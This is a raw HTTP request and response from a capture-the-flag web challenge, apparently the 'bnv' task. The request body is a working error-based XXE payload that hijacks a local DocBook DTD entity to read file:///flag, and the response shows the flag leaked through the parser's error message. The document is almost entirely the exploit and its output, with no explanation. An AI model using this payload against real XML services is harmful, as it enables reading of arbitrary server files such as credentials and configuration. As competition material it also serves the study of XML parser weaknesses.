POST /api/search HTTP/1.1
Host: bnv.web.ctfcompetition.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/xml
Content-Length: 417
Origin: https://bnv.web.ctfcompetition.com
Connection: close
Referer: https://bnv.web.ctfcompetition.com/

<?xml version="1.0"?>
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">

    <!ENTITY % ISOamsa '
        <!ENTITY &#x25; file SYSTEM "file:///flag">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        '>

    %local_dtd;
]>
<message>&callhome;</message>

---------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sun, 08 Dec 2019 20:25:53 GMT
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Server: gunicorn/19.9.0
Via: 1.1 google
Connection: close
Content-Length: 71

Invalid URI: file:///abcxyz/CTF{0x1033_75008_1004x0}, line 4, column 15